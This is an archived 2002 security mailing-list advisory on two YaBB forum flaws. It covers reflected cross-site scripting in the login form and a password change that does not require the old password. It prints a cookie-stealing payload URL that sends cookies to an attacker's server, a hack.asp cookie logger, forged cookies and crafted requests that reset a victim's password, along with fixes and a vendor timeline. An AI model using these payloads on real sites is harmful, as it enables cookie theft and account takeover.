New Vulnerability on YaBB 1.4.0 and YaBB 1.4.1 forums

From: Nir Adar (niradarat_private)
Date: Fri Oct 18 2002 - 09:58:34 PDT

  • Next message: Martin Schulze: "[SECURITY] [DSA 179-1] New gnome-gv packages fix buffer overflow"

    Two security vulnerabilities in YaBB allows stealing
    users cookies and hijacking users accounts.
    Tested on:
    YaBB 1.40 & 1.41
    Summary :
    YaBB is a leading provider of free, downloadable php
    forums for webmasters. Two security vulnerabilities in
    the product 
    allows a remote attacker to steal users cookies,
    hijacking users accounts, and more. The issues
    discussed are :
    1. Cross Site Scripting Vulnerability on the login
    2. Unsecured changing profile method.
    *************** 1. Cross Site Scripting Vulnerability
    on the login procedure ******************
    If we log into YaBB forums and enter invalid
    username/password, the forum displays the username and
    the password we entered, 
    and it doesn't strip HTML tags from the password
    field, allowing us to write malicious HTML and
    JavaScript into the page. 
    From now on, stealing the username cookie is pretty
    easy. The method for this is creating a css
    vulnerability in the target 
    site, forcing him to send the cookie to an .asp file
    we have created. This can be done by this statement :;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD>window.locatio
    Sending the above url to someone can be suspicious to
    him but we can build a site which have a invisible
    frame to that url, 
    which is alot more dangerous.
    NOTE : the yabb doesnt allow us to use "=" or "%3d",
    so we have to catch the cookie without a
    request("data") statement in 
    the asp file, because then we will need to put "data="
    in the url.
    Ok, now lets build the hack.asp file, to log the
    cookie we are posting. The file should look like this
    ------------------------------- hack.asp
    Option Explicit
    Const ForWriting = 2
    Const ForAppending = 8
    Const Create = True 
    Dim MyFile 
    Dim FSO ' FileSystemObject
    Dim TSO ' TextStreamObject
    Dim Str
    Str = Request.ServerVariables("QUERY_STRING")
    MyFile = Server.MapPath("./db/log.txt")
    Set FSO =
    Set TSO = FSO.OpenTextFile(MyFile, ForAppending,
    if (Str <> "") then TSO.WriteLine Str
    Set TSO = Nothing
    Set FSO = Nothing
    You have just been hacked.
    ----------------------------------- EOF
    This file writes
    Request.ServerVariables("QUERY_STRING"), which is the
    whole path we are posting after the "?", into a log 
    ************* 2. Unsecured changing profile method
    YaBB has a form to change users details. the original
    password is not required when changing the password to
    a new one, 
    meaning that if an attacker have someone else cookie,
    he can change his password.
    - Defines:
    USERNAME - The username
    USERNAME COOKIE- The username cookie.
    - YaBB Cookie Explanation :
    The cookie's format of YaBB is something like :
    Cookie: YaBBusername=<USERNAME>;
    After the attacker got the cookie, he can use the
    cookie to change the user password. He can use the
    cookie even if the 
    expiretime has passed by changing the cookie to the
    following :
    Cookie: YaBBusername=<USERNAME;
    This one will always work.
    - Exploiting the server and changing to a new password
    First of all, if the attacker only want to change the
    password and not the user details, he will have to get
    them from the 
    server database and only then he will build his POST
    request that will change the user's password. to do
    that, he also have 
    to include the stolen cookie.
    to find out the user details, he will send this
    request to the server :
    Accept: image/gif, image/x-xbitmap, image/jpeg,
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows
    NT 5.0)
    Proxy-Connection: Keep-Alive
    Then the server will return a form with the <USERNAME>
    details, and allow attacker to change it. Note that
    the form doesn't 
    ask the user to enter his previous password, and it
    doesn't check anything but the username and his cookie
    to see if it is 
    the legitimate user. Now attacker is ready to build
    his main POST request to change the user's password
    The POST request might look like this :
    POST /forums/index.php?board=;action=profile2 HTTP/1.1
    Accept: application/,
    application/msword, image/gif, image/x-xbitmap,
    image/pjpeg, */*
    Accept-Language: en-us
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows
    NT 5.0; 
    Content-Length: 286
    Proxy-Connection: Keep-Alive
    Pragma: no-cache
    All the details that the attacker set are values taken
    from the form he got when he sent the GET request
    first (note that 
    userID is a hidden value).
    You can see the "passwrd1" and "passwrd2" parameters
    that attacker send to the server.
    After sending the above POST request, the user's
    password will be changed to "HaCkEd".
    - Possible Solution: 
    For the CSS Problem : Dont show the invalid
    username/password, or at least strip HTML tags from
    the password field 
    For the password changing problem :
    1. YaBB can save the IP of each user, and check the IP
    when someone asks to change his password. (Still not
    unbreakable, but 
    much harder to exploit).
    2. YaBB can ask the user to enter also the previous
    password before changing it to new one. In that way
    the attacker won't be 
    able to break the forum protection by having only the
    user's cookie.
    The security vulnerabilities were found by:
    Assaf Reshef
    Email: assafat_private
    Nir Adar
    Email: niradarat_private
    Vendor status : 
    10.10 First contact with the vendor, about the first
    security issue. 
    11.10-16.10 Talking with the vendor. Vendor didnt take
    this seriously 
    18.10 Second contact about the second security issue 
    18.10 Vendor didnt take this issue seriously either
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